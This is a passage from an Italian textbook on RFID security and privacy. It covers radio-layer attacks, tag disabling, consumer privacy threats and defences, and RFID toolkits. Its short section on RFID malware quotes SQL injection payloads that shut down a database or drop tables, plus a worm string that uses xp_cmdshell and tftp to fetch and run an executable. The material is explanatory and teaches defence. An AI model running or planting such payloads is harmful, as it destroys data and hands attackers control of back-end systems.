Questo tipo di attacco non è complesso da realizzare ma non permetteall’hacker di manipolare i dati in transito, si tratta essenzialmente di undisturbo al servizio, attuabile per breve tempo e funzionale ad azioni dialtro tipo.La contromisura è l’ascolto da parte di un sistema indipendente di con-

trollo, attrezzato meglio di un Reader commerciale, non tanto per rico-struire i dati corretti, ma per percepire la situazione e dare l’allarme.

2.4.2 Data Modification

Nell’attacco di “Data Modification”, l’aggressore tenta di modificare idati in transito in modo che vengano ricevuti alterati.L’alterazione, in questo caso, è attuata per far sì che i dati vengano ricevu-ti come validi (ancorché manipolati).La tecnica è quindi differente da quella precedente (disturbo della comu-nicazione).La fattibilità di questo attacco dipende dall’indice di modulazione (cfr.parte IV) utilizzato da chi trasmette, e dalla conseguente tecnica di deco-difica. Nel seguito si tratteranno i casi di codifica Miller modificato conindice di modulazione del 100% (tipico di un TAG passivo) oppureManchester con indice di modulazione del 10% (tipico di un Reader oTAG attivo).• Caso di codifica Miller modificato (cfr. §IV.1.3) con indice di modula-zione al 100%: il decoder essenzialmente verifica la presenza o l’assen-za di modulazione dei due mezzi bit per decidere se il bit sia uno ozero. Scopo dell’aggressore è far credere al decoder che un bit uno siazero e viceversa; per far questo dovrebbe attuare due azioni:- Un’assenza di modulazione dovrebbe essere riempita con una por-tante. Questa è una azione possibile.

- Una presenza di modulazione dovrebbe essere percepita dal ricevi-tore come assenza; questo sarebbe possibile solo inviando una por-tante in perfetta controfase e di ampiezza accuratamente calibrata, inmodo che, al ricevitore, la somma delle portanti sia nulla. Questa èuna azione praticamente impossibile.Tuttavia, per la struttura del codice Miller modificato, nel caso di

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 351

Page 337: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva352

due uno di seguito, l’aggressore può cambiare il secondo uno inzero, riempiendo la pausa che lo codifica. Il decoder dovrebbe oravedere una presenza di modulazione nel secondo bit e dovrebbedecodificarlo come uno zero, in quanto risulta preceduto da un uno.In conclusione, nell’uso dell’indice di modulazione al 100% l’ag-gressore non può mai cambiare in uno un bit zero, ma può cambia-re in zero un bit con valore uno, se questo è preceduto da un altrouno (ciò avviene con probabilità = 0,5).

• Caso di codifica Manchester (cfr. §IV.1.1) con indice di modulazione al10%: il decoder misura entrambi i livelli dei segnali (uno con ampiezzapari all’82% dell’ampiezza della portante e l’altro con ampiezza pari aquella della portante) e li compara. Nel caso i segnali vengano ricono-sciuti nel giusto range di livelli, sono decodificati. Un aggressore potreb-be tentare di aggiungere un segnale a quello modulato all’82%. L’effettosarebbe che quest’ultimo appaia con ampiezza massima (pari a quelladella portante) mentre quello con ampiezza massima appaia all’82%.In questo modo i bit vengono decodificati di valore opposto rispetto aquello trasmesso.La fattibilità dell’attacco dipende molto dal range dei segnali che il rice-vitore ammette in ingresso. È infatti possibile che il livello più alto delsegnale modificato superi il livello massimo di ingresso al ricevitore.In conclusione, per il codice di Miller modificato con indice di modu-

lazione al 100% l’attacco è possibile solo su certi bit, mentre per il codi-ce Manchester con indice di modulazione al 10% l’attacco è possibile sututti i bit.Per questo attacco la contromisura consiste nel già citato allestimento

di un “canale sicuro” di cui si vedrà nel seguito.

2.4.3 Data Insertion (Inserimento di falsi messaggi)

Questo tipo di attacco viene attuato inserendo messaggi apparentementecorretti tra i dati scambiati tra due apparati.Per realizzare ciò sulla risposta di un apparato, è necessario che la rispo-

sta stessa richieda un tempo considerevole per essere effettuata. In questocaso l’aggressore può inserire il proprio messaggio prima della risposta.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 352

Page 338: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID353

L’inserimento del falso messaggio avrà successo solo se questo verràtrasmesso prima che l’apparato interrogato inizi a rispondere. Se i dueflussi di dati si sovrapponessero, infatti, i dati verrebbero alterati, ricevu-ti come non validi e l’attacco fallirebbe (generando un caso di collisionedella comunicazione).Per questo attacco ci sono tre possibili contromisure:

• La prima è ridurre il ritardo di risposta dell’apparato interrogato fino arendere impossibile l’attacco.

• La seconda misura consiste nell’ascolto del canale per un tempo lungo,questo dovrebbe far scoprire l’attacco, sempre che per una interroga-zione non siano consentite risposte da diversi apparati.

• La terza contromisura consiste nel già citato allestimento di un “cana-le sicuro” di cui si vedrà nel seguito.

2.4.4 Attacco del terzo estraneo (Man-in-the-Middle-Attack)

Nella situazione classica dell’attacco da parte di un terzo estraneo (Man-in-the-Middle Attack) due apparati che stanno scambiandosi dati(Apparato A e Apparato B), sono ingannati da una terzo estraneo (hac-ker) attraverso una conversazione a tre, come nella situazione mostrata inFigura VIII.8.

Durante l’attacco i due apparati non sono consapevoli di non parlare traloro, bensì con l’aggressore che simula, alterandoli, i dati di entrambi.Se il canale non è protetto, l’attacco del terzo estraneo ha buone possi-

bilità di riuscire. Nel caso dell’allestimento di un “canale sicuro” (che seinstaurato correttamente vanificherebbe l’attacco), i due apparati dovreb-

Figura VIII.8Attacco del terzo estraneo

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 353

Page 339: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva354

bero concordare una chiave segreta che useranno per cifrare i dati gene-rando un canale sicuro. Tuttavia l’aggressore può concordare una chiavecon l’apparato A ed una con l’apparato B continuando ad intercettare lecomunicazioni ed alterare i dati.Si vuole ora sviluppare questo caso, che costituisce quello di maggior

interesse.Assumendo che l’apparato A si comporti come attivo e l’apparato B

come passivo, si genera la seguente situazione:• L’apparato A genera un campo RF per inviare i dati a B.• L’ aggressore intercetta i dati e disturba la trasmissione in modo chel’apparato B non la decodifichi.- Se l’apparato A si accorge del disturbo, interrompe la trasmissionedella chiave segreta e l’attacco non può continuare.

- Se l’apparato A non si accorge del disturbo, lo scambio di chiavicontinua con l’aggressore.

• Nel prossimo passo, l’aggressore deve inviare i dati a B, questo costitui-sce un problema perché, comportandosi B come passivo, A continua atrasmettere il campo RF (per permettere il Backscatter di B) e l’aggres-sore, che deve emettere i propri (falsi) dati, ha difficoltà ad allineare ledue emissioni (quella propria con quella di A che si aspetta un segnaleBackscatter). In questo modo è difficile che B decodifichi i (falsi) datidell’aggressore

L’altra situazione possibile è che entrambi gli apparati A e B si compor-tino come attivi, si genera la seguente situazione:• Anche in questo caso l’apparato A genera un campo RF per inviare idati a B e l’aggressore intercetta i dati e disturba la trasmissione inmodo che l’apparato B non la decodifichi.- Se l’apparato A si accorge del disturbo, interrompe la trasmissionedella chiave segreta e l’attacco non può continuare.

- Se l’apparato A non si accorge del disturbo lo scambio di chiavi con-tinua con l'aggressore.

• A prima vista sembra che l’inganno possa funzionare perché (in unacomunicazione tra due apparati attivi) ora l’apparato A ha spento il

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 354

Page 340: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID355

campo RF. Quando però l'aggressore accende il proprio campo RF perinviare i dati a B, A che si aspetta la risposta di B, si può accorgere del-l’inganno e bloccare il protocollo.Le raccomandazioni, in questo caso, sono di preferire la comunicazio-

ne attivo/passivo in modo che uno dei due apparati generi con continui-tà un campo EM. Inoltre l’apparato attivo dovrebbe restare in ascolto perrilevare eventuali anomalie generate da eventuali aggressori e bloccare loscambio delle chiavi.

“MALWARE” (INIEZIONE DI CODICE MALIGNO)I sistemi RFID interagiscono spesso con altri sistemi informatici (ad esem-pio, comunemente, con dei database di back end). Tuttavia, molto spessoi progettisti di questi sistemi si dimenticano che le informazioni lette daiTAG sono nuovi input da validare.Ci si può quindi attendere che, in caso di mancata validazione dell’in-

put, sia possibile eseguire degli attacchi ad esempio di “SQL Injection”tramite i TAG. Di solito le etichette hanno pochi bit di memoria, ma sonosufficienti per contenere corti comandi SQL quali “; shutdown--” o “;drop table <tablename>” che provocano rispettivamente lo spegnimentodel DBMS o la cancellazione di una tabella.È possibile anche scrivere dei codici che si autopropagano tramite

RFID (RFID worm), come ad esempio “; EXEC Master..xpcmdshell ‘tftp-i %ip% GET myexploit.exe & myexploit‘ --”.È infine riconosciuta la possibilità di generare virus RFID (ad esempio

virus costituiti da soli 233 caratteri in TAG RFID da 2 kbit).

SICUREZZA DEI SISTEMI VS. CONDIZIONI AMBIENTALI

PROPAGAZIONE IN CONDIZIONI CRITICHE & SCHERMATUREIn precedenza si è visto come le intercettazioni, la maggior parte degliattacchi alla sicurezza ed anche le misure di protezione dagli stessi, dipen-dano dalle condizioni di propagazione dei segnali nell’ambiente in cui

VIII.2.5

VIII.3

VIII.3.1

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 355

Page 341: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva356

opera il sistema RFID. Si vogliono quindi citare alcuni aspetti ambientaliche influenzano la propagazione e, di conseguenza, la comunicazione traTAG, Reader ed eventuale aggressore.

• La prima osservazione riguarda le condizioni climatiche; livelli di umi-dità ambientali elevati possono infatti ridurre di qualche unità percen-tuale la capacità di lettura corretta dei TAG (naturalmente pioggia onebbia fitta peggiorano ulteriormente le condizioni di propagazione).

• Le modulazioni di ampiezza utilizzate in numerosi sistemi RFID sonosensibili al fading. Ad esempio, carrelli elevatori con pallet in cui è con-tenuto un elevato numero di TAG, che si muovono tra Reader dispostitra strutture metalliche, possono trovarsi in condizioni critiche genera-te da cammini-multipli. Il fading risultante può non essere distinguibi-le da effetti della modulazione di ampiezza, determinando conseguen-temente errori sui dati decodificati. Naturalmente gli stessi effetti siverificano per il movimento dei Reader.

• A bassa frequenza, per esempio a 13,56 MHz, la comunicazione RF trail TAG ed il Reader diventa critica nel caso in cui il campo magneticodeve attraversare materiali che attenuano la potenza del campo stessocome nel caso di oggetti metallici. In più, i TAG non sono rilevati quan-do sono collocati all’interno di contenitori metallici poiché il metalloopera come uno schermo nei confronti del flusso magnetico attenuan-done drasticamente gli effetti. Questo è un fatto da tenere in conto nonsolo per il dimensionamento dei sistemi ma anche per gli attacchi por-tati a carte senza contatto o sistemi anti taccheggio.

• Studi recenti della School of Packaging presso la Michigan StateUniversity evidenziano effetti irreversibili dell’umidità sui cartoni daimballaggio. È stato infatti messo in luce un fenomeno particolarmen-te significativo ed inaspettato che l’umidità determina sul cartone perimballaggi. Il cartone, se asciutto, non crea nessun tipo di ostacolo allapropagazione radio; ovviamente quando assorbe umidità il cartonealtera in maniera rilevante le condizioni di propagazione riducendo inalcuni casi drasticamente (50%) la velocità di lettura di TAG presentisul cartone o al suo interno. Il risultato più significativo ed inaspettato,però, è che il cartone asciugato non ritorna allo stato iniziale a causa di

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 356

Page 342: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID357

un fenomeno (isteresi) di ritenzione, seppur parziale, dell’umidità. Ciòsi traduce in un’alterazione permanente delle condizioni di propagazio-ne radio e conseguentemente una ridotta efficienza di lettura dei siste-mi RFID.

• Nella Tabella VIII.1 che segue sono riassunti gli effetti sui segnali aradiofrequenza da parte di materiali che possono trovarsi all’internodella distanza operativa di un sistema RFID.

• Altri effetti negativi sono dovuti a fenomeni di backscatter generati davarie fonti: parti metalliche in rapido movimento (pale di ventilatori oruote di vario genere) luci fluorescenti (sia da parte di reattori malschermati sia attraverso il plasma)Infine, nella Figura VIII.9, viene illustrata (tra il serio ed il faceto) una

efficace misura di sicurezza “personale”: portafogli foderati in alluminio,“sicuro” contro tracciamento o clonazione di carte senza contatto e TAG.

Tabella VIII.1Effetti sui segnali RF di materiali tipici

Figura VIII.9Portafogli “sicuri” RFID Blocking Wallet

www.difrwear.com… … made of the finest quality leather … …

The wallets contain a layer of RF shieldingthat prevents RFID readers from reading any

passive tags stored within

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 357

Page 343: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva358

DISABILITAZIONE DELLE ANTENNE: TOTALE (KILLING) O PARZIALE (CLIPPING)Il principale provvedimento per assicurare la privacy (e quindi la sicurez-za) del consumatore, parte dal principio che, una volta acquistata lamerce, cessa l’interesse a rendere disponibili le informazioni contenutenel TAG.Oltre all’asportazione fisica dei TAG dagli oggetti, un altro provvedi-

mento drastico ma estremamente efficace (per il consumatore) è la possi-bilità di disabilitazione permanente del TAG medesimo. La funzione,chiamata “killing” è stata realizzata nei TAG UHF Gen2 (cfr. §VIII.5.4)e se ne prevede l’implementazione all’uscita dei punti vendita al dettaglio.La problematicità consiste nel blocco irreversibile del servizio.Una possibilità alternativa alla disabilitazione irreversibile del TAG è il

cosiddetto “clipping” cioè l’operazione che consente di ridurre la distan-za operativa del TAG a pochi centimetri mediante la rimozione parziale(strappo fisico) della sua antenna. Questa operazione consente di incre-mentare significativamente la privacy senza compromettere completa-mente la funzionalità del TAG. Risulta utile qualora l’utente possedesseelettrodomestici “intelligenti” (frigoriferi, lavatrici, ecc.) in grado di sfrut-tare le informazioni dei TAG introdotti (biancheria, generi alimentari,ecc.) lette da pochi centimetri di distanza.Tale approccio, pur possedendo un grado di sicurezza limitato, offre

alcune caratteristiche interessanti, in particolare:• è il consumatore che può operare direttamente la scelta di ridurre ladistanza operativa del TAG;

• fornisce una conferma “fisica” di tale operazione;• consente un successivo utilizzo del TAG per applicazioni con proble-matiche di privacy limitate.

VIOLAZIONE DELLA PRIVACY(letture non autorizzate & tracciamento illecito)Oggi un grande allarme sociale viene destato dagli attacchi mirati alla vio-lazione della privacy dei cittadini/consumatori, indipendentemente daltipo di threat impiegato.

VIII.4

VIII.3.2

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 358

Page 344: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID359

L’origine degli attacchi alla privacy, deriva dal fatto che i TAG uscitidalla catena di distribuzione (dopo la vendita dei beni), continuano adoperare su oggetti in possesso di cittadini spesso ignari.L’acquisizione illecita dei dati quando i TAG, ormai usciti dalla catena

di distribuzione, continuano a funzionare, costituisce quindi una minac-cia temutissima e molto dibattuta.L’allarme deriva dal possibile scopo di questi attacchi, scopo che

potrebbe consistere nel tracciamento o nella profilazione dell’utente chedetiene (anche a sua insaputa) il TAG.La fonte della vulnerabilità di riservatezza deriva dal fatto che gran parte

delle etichette possono essere lette anche al di fuori del contesto applicati-vo per cui sono state pensate; ad esempio da Reader gestiti da aggressori.Questa modifica di contesto, che si traduce nel tracciamento illecito dei

TAG, fa sì che, ad esempio, un sistema di inventario automatizzato possavenire sfruttato da un competitor, o da un malintenzionato, per fare unaanalisi non autorizzata di ciò che è custodito in un magazzino violandocosì la sicurezza industriale. Ma la minaccia più temuta è l’acquisizioneillecita dei dati delle etichette quando la merce a cui sono associate è inpossesso del cittadino consumatore che, peraltro, potrebbe averla pagatacon una carta elettronica, lasciando così traccia della propria identità. Iltracciamento illecito e l’inventario di ciò che le persone possiedono è per-tanto universalmente ritenuta una preoccupante violazione della privacy.La “invisibilità” e “silenziosità” dei TAG così come dei Reader è con-

siderata un fattore aggravante per la possibilità di raccogliere informazio-ni riguardanti un certo prodotto e, in dipendenza dalle circostanze, anchedella persona che porta quel prodotto, senza informare la persona stessae senza averne il suo consenso.In linea di principio, un’applicazione RFID potrebbe acquisire una

grande mole di dati. Se un prodotto dotato di TAG è, per esempio, paga-to con una carta elettronica, è possibile collegare l’ID che identifica uni-vocamente quel prodotto con l’identità dell’acquirente. Il collegamentocon l’identità è ancora più agevole se il cliente esibisce all’acquisto una“loyalty card” (carte fedeltà, carte sconto, raccolte punti, ecc.) notoria-mente meno protette delle carte elettroniche di pagamento.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 359

Page 345: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva360

Figura VIII.10Principali minacce alla privacy dei

consumatori

Inoltre sarebbe possibile interrogare tutti i TAG associati agli oggetti eagli abiti che il consumatore porta con sé utilizzando le informazioni otte-nute per creare un profilo della persona, anche in modo indipendentedalla conoscenza della sua identità.Un esempio “innocuo” ed “anonimo” potrebbe essere quello di scher-

mi pubblicitari che trasmettono spot “mirati” in base alla combinazionedelle informazioni presenti nei TAG detenuti delle persone circostanti.Tale profilo, però, potrebbe esser utilizzato per vari scopi, ad esempio

per valutare l’importanza di un consumatore per una certa azienda, maanche per impieghi criminosi quali aggressioni a portatori di beni di valo-re o ricatti se determinati oggetti possono screditare l’immagine di chi lipossiede.I lettori di romanzi di spionaggio, sanno bene quanta cura mettano gli

agenti segreti (o gli scrittori dei romanzi) ad eliminare le etichette (tradi-zionali) sui propri capi di abbigliamento, perché, in caso di cattura, da unesame delle etichette si potrebbero acquisire informazioni sulla vera ori-gine delle spie medesime.In una celebre (ed ancora attuale) presentazione (Security and Privacy for

Five-Cent Computers) di Ari Juels, di RSA Laboratories, al 13th USENIXSECURITY SYMPOSIUM, a San Diego, nel 2004, si paventavano le prin-cipali minacce alla privacy degli consumatori conseguenti all’introduzionemassiva degli RFID, come simpaticamente riportato nella Figura VIII.10.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 360

Page 346: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID361

Ancor più insidiosi sono i casi di inserimento di TAG RFID in documen-ti (nel caso dei passaporti, ad esempio, è già una realtà), nelle banconote onelle pubblicazioni (giornali, riviste, libri).Nel caso di banconote si tratta di un modo per evitare la contraffazione,

nel caso di documenti si facilitano i controlli; l’incognita però sta nella con-seguente perdita di riservatezza e sicurezza. Infatti dai chip delle banconotepotrebbero essere tratte informazioni sull’ammontare del denaro in posses-so di un cittadino, da quelli dei documenti informazioni per identificare turi-sti, o persone di una particolare nazionalità; in entrambi i casi ciò aprirebbela via ad aggressioni mirate.L’inserimento di RFID nelle pubblicazioni (giornali, riviste, libri) per faci-

litarne la distribuzione implica anche l’identificazione delle “preferenze” dichi detiene le pubblicazioni (magari nascoste); “Interessante che abbia unacopia di questa rivista nella tua borsa!”.Analizzando la problematica si evince che gli “effetti indesiderati” sono

semplici ribaltamenti dei vantaggi dell’inserimento pervasivo di TAG RFIDnegli oggetti. Gli stessi TAG che un rapinatore potrebbe usare per tracciarele banconote nella tasca di una potenziale vittima, sono stati pensati per con-sentire alla polizia di rintracciare il rapinatore. A volte gli effetti sono i mede-simi, sotto differenti punti di vista: il tracciamento dei prodotti che spaven-ta il cittadino consumatore è intenzionale e desiderato da chi ha concepito ilsistema. Pertanto la chiave per un’introduzione non traumatica della tecno-logia RFID negli oggetti, è l’accurato bilanciamento tra vantaggi operativi edapertura a possibili threat.In particolare, dissipare i timori riguardo la privacy dei consumatori è un

requisito essenziale nell’ambito della vendita al dettaglio. La difficoltà diottenere una situazione di serenità sugli usi possibili degli RFID è il motivoper cui molte tra le aziende produttrici di articoli e tra le organizzazioni divendita al minuto, pur attuando (a volte massivamente) l’introduzione diRFID nei loro prodotti, non danno nessuna pubblicità all’evento e, in qual-che caso, vincolano gli installatori dei sistemi alla riservatezza.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 361

Page 347: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva362

DIFESA DELLA PRIVACY

4.1.1 Blocco della correlazione dei dati

La prima considerazione sulle difese è che: “Leggere” non è grave come“correlare”.Infatti, in teoria sarebbe anche possibile la localizzazione geografica ed il

tracciamento di una persona attraverso i TAG RFID che porta con sé, spe-cie se le applicazioni fossero integrate in sistemi estesi. Per esempio il siste-ma EPC Global crea identificatori dei prodotti dotati di TAG unici a livel-lo mondiale, pertanto, l’individuazione, in un determinato luogo, anche diun solo oggetto di sicura appartenenza ad una persona, fornisce l’informa-zione che, con buona probabilità, la persona si trovi in quel luogo.Quest’ultima ipotesi, tuttavia, appartiene più alla fantascienza che alla

realtà, necessitando l’incrocio di molte informazioni contenute in moltebanche dati differenti, specie se queste riguardano pagamenti o titoli dipossesso degli oggetti. Questo incrocio è vietato dalle leggi di tutti i paesicivili, quindi è estremamente difficile risalire dall’identificativo di unoggetto, all’identità del proprietario.Riassumendo:

• Correlare l’ID che identifica univocamente un prodotto con le infor-mazioni sul prodotto medesimo, è possibile se si verifica una di questecondizioni:- Il TAG contiene informazioni “in chiaro”;- Le basi dati delle aziende sono accessibili.

• Correlare l’ID che identifica univocamente un prodotto con l’identitàdell’acquirente è possibile se si riesce ad accedere (commettendo reato)ad una delle seguenti banche dati:- Quella della carta elettronica con cui il prodotto è stata pagato;- Quella che gestisce la “loyalty card” del consumatore.Una precauzione generale consiste nella limitazione dei dati memoriz-

zati nel TAG, ovvero nell’includere nel TAG solo il puntatore alle infor-mazioni contenute in una base di dati opportunamente protetta e magaricontestualizzata solo in un segmento della catena di distribuzione, spo-stando così su quest’ultima l’implementazione delle politiche di sicurezza.

VIII.4.1

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 362

Page 348: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID363

Lo spionaggio industriale dall’interno della catena di distribuzione,infatti, potrebbe essere favorito quando i TAG contengano informazioniarticolate sul prodotto (ad esempio codice EPC, date di scadenza o com-posizione del prodotto, il tutto in chiaro).In tale ambito si prefigurano anche rischi di sabotaggio industriale cioè

alterazione (cancellazione / modifica) dei dati dei TAG usando un appa-rato portatile.Nei casi più delicati neanche l’uso in chiaro dell’EPC è consigliabile, pre-

ferendone la sostituzione con un numero pseudocasuale (privo quindi diinformazioni) che costituisca la chiave d’ingresso alla base di dati protetta.In altri termini, dalla sola interrogazione (o intercettazione) dei dati del

TAG, non si dovrebbe poter risalire agevolmente alla natura degli ogget-ti medesimi.In conclusione, una delle migliori misure di prevenzione è una proget-

tazione dei sistemi che minimizzi il rischio di violazione della privacy dellepersone. In questa ottica gli elementi fondamentali da considerare sono lacreazione di policy che analizzino le problematiche connesse all'accessonon autorizzato ai dati contenuti nei TAG e, soprattutto, la possibilità dicorrelare queste informazioni con altre, valutando la potenziale compro-missione della privacy.Altra precauzione fondamentale, come si è già detto, è la limitazione

dei dati: ridurre il contenuto dei TAG a numeri, usare TAG pseudonimie distruggere l’associazione con altre informazioni dai sistemi di back endnon appena esse divengano inutili.Queste avvertenze confliggono spesso con l'approccio di data ware-

house comune in aziende ed organizzazioni, che prevede particolari basidi dati finalizzate al supporto delle decisioni. La struttura di data ware-house in genere è separata dai sistemi di gestione aziendale e concepitacome integrazione tra dati provenienti da più sistemi e fonti esterne.Inoltre le funzioni sono orientate a temi specifici dell'azienda piuttostoche alle applicazioni, ovvero il data warehouse fornisce dati che abbianouna struttura in grado di favorire la produzione di informazioni. Per otte-nere ciò queste strutture tendono ad accumulare dati anche quando nonsono più necessari alla produzione o al commercio, creando una sorta di

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 363

Page 349: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva364

deposito o “memoria” dei dati aziendali acquisiti a qualunque titolo.L’inesistenza ed irrilevanza dei dati è invece la migliore difesa possibile

contro attacchi alla privacy. L’etica professionale dovrebbe suggerire que-sto approccio ai tecnici, di fronte alle potenziali minacce create non soloda ipotetici aggressori esterni, ma anche da potenziali utilizzi discutibilidelle informazioni da parte di modelli di business sempre più aggressivi enon sempre etici.Infine, a proposito di problematiche di privacy, andrebbero considera-

ti anche i provvedimenti di governi e forze di polizia, a volte disponibili acompromessi al ribasso in tema di tutela della riservatezza, pur di conse-guire risultati nella lotta al terrorismo o alla criminalità organizzata.

4.1.2 Uso di tecniche crittografiche

La seconda considerazione, si riferisce all'utilizzo di tecniche di crittogra-fia ed autenticazione (cfr. §VIII.5).A questo proposito bisogna ricordare che, per i TAG a basso costo,

bisogna trovare un modo “sostenibile” di usare la crittografia. Una critto-grafia efficace, infatti, è percorribile con difficoltà allo stato attuale dellatecnologia dei TAG RFID: la potenza di calcolo dei chip è troppo bassaper poter eseguire algoritmi crittografici robusti (come si vedrà nel segui-to). Inoltre, se i chip sono quelli “a perdere” destinati alla grande distri-buzione, è verosimile che una potenza di calcolo adeguata continui adessere antieconomica anche nel futuro.Le tecniche che è possibile utilizzare per preservare la riservatezza sono

quelle che pur essendo abbastanza raffinate ed efficaci, non richiedonopotenza di calcolo nel TAG ma solo nel Reader. L’esempio più diffuso èl’uso di funzioni hash (cfr. §VIII.5.1.1) per il mutuo riconoscimento(autenticazione) tra TAG e Reader, nonché per cifrare i dati scritti nelTAG. Tuttavia queste tecniche sono soggette ad attacchi di tipo “replyattack” (possibilità per un attaccante di replicare o riutilizzare stringhedati catturate da una precedente sessione, seppur cifrate ed incomprensi-bili). In definitiva, pur essendo efficaci contro l’uso fraudolento e l’altera-zione dell’informazione, non proteggono contro l’intercettazione ai fini diclonazione dei TAG.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 364

Page 350: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID365

4.1.3 Uso di pseudonimi

Altra tecnica efficace contro il tracciamento e che non richiede grandepotenza di calcolo è l'utilizzo di “pseudonimi”, ovvero un insieme di iden-tificativi che il TAG RFID utilizza in modo interscambiabile. I lettoriautorizzati conoscono l'insieme e sono in grado di associarlo al TAG,mentre i lettori non autorizzati non riescono, in questo modo, a tracciaree seguire il singolo TAG.

4.1.4 Schermatura, disabilitazione o eliminazione dell’antenna

Una schermatura fisica (anche un semplice foglio d'alluminio per usi ali-mentari) può essere una soluzione per evitare letture indesiderate. Sonostati anche commercializzati appositi contenitori (ad esempio un portafo-gli che protegge i chip di carte di pagamento e banconote, cfr. §VIII.3.1).Altre soluzioni “fisiche” consistono nell’uso di TAG che supportino la

disabilitazione delle antenne (cfr. §VIII.3.2): totale (Killing) o parziale(Clipping) (ad esempio, disattivare i TAG in fase di uscita da un negozio).Sono soluzioni abbastanza semplici e verificabili in modo da generare fidu-cia nel consumatore. Tuttavia, sempre in dipendenza dall'impossibilità diautenticare le fonti del comando, questo tipo di operazione per essere affi-dabile deve essere irreversibile: cosa che può avere economicamente sensosui TAG “a perdere”, ma che non ne ha in altri casi. Come si vedrà nelseguito, le etichette RFID UHF di recente fabbricazione (i TAG Gen2),hanno la possibilità di essere disabilitati definitivamente con un comando.Ciò rimuove tutte le possibilità di tracciamento post vendita degli oggetti.Da non trascurare, infine, anche la soluzione più banale (ma sicura-

mente efficace) che preveda l’obbligo di segnalare la presenza di TAGsulle merci e di collocare i TAG medesimi in modo che possano esserefisicamente eliminati successivamente all’acquisto delle relative merci.

4.1.5 Difesa attiva con Denial of service

Alcuni esperti stanno sviluppando uno strumento portatile denominato“RFID Guardian” (http://www.rfidguardian.org) in grado di bloccareselettivamente i TAG nell'area attorno ad un soggetto (cfr. §VIII.2.2) contecniche di difesa attiva che blocchino il servizio (Denial of Service).

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 365

Page 351: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva366

4.1.6 Case study

Esistono svariati software e toolkit per esplorare, leggere ed eventualmen-te ri-scrivere TAG RFID.I due più completi che meritano di essere citati sono RF-DUMP

(http://www.rf-dump.org/) e RFIDiot (http://rfidiot.org).RF-DUMP viene utilizzato per leggere/scrivere TAG ISO e Smart-

Label; è rilasciato come software GPL per Windows o Linux, e ha un’in-terfaccia grafica (GTK) oppure una versione da linea di comando. È uti-lizzabile con un reader ACG Multi-Tag (socket compact flash, oPCMCIA con un adattatore).I test condotti dai due sviluppatori hanno dimostrato come sia sempli-

ce editare i riferimenti dei prodotti.Ha inoltre mostrato la pericolosità di quelli che vengono definiti

“Real-Life Cookies”.RFIDiot invece è una libreria Python per “esplorare” dispositivi RFID.

È utilizzabile con reader a 13,56 MHz o 125/134,2 kHz, ed è anch’essarilasciata sotto licenza GPL.

PUNTI DI VISTA ISTITUZIONALI

La rilevanza sociale delle questioni sulla privacy ha portato a pronunciamen-ti da parte delle istituzioni preposte alla sua tutela. In merito si ricordano:

• UE - gennaio 2005“Working document on data protection issues related to RFID techno-logy” emesso , nel gennaio 2005 dal gruppo di lavoro “articolo 29”sulla protezione dei dati. Articolo 29 è un organo europeo indipenden-te, a carattere consultivo in materia di tutela dei dati e della vita e dellavita privata, istituito ai sensi dell'articolo 29 della direttiva 95/46/CE.In questo documento datato ma ancora valido, si elencano le principa-li implicazioni sulla protezione dei dati personali che derivano dai dif-ferenti usi della tecnologia RFID:- RFID used to collect information linked to personal data;- RFID used to store personal data on each tag;- Use of RFID to track without “traditional” identifiers being available

VIII.4.2

Figura VIII.11Reader RFID

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 366

Page 352: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID367

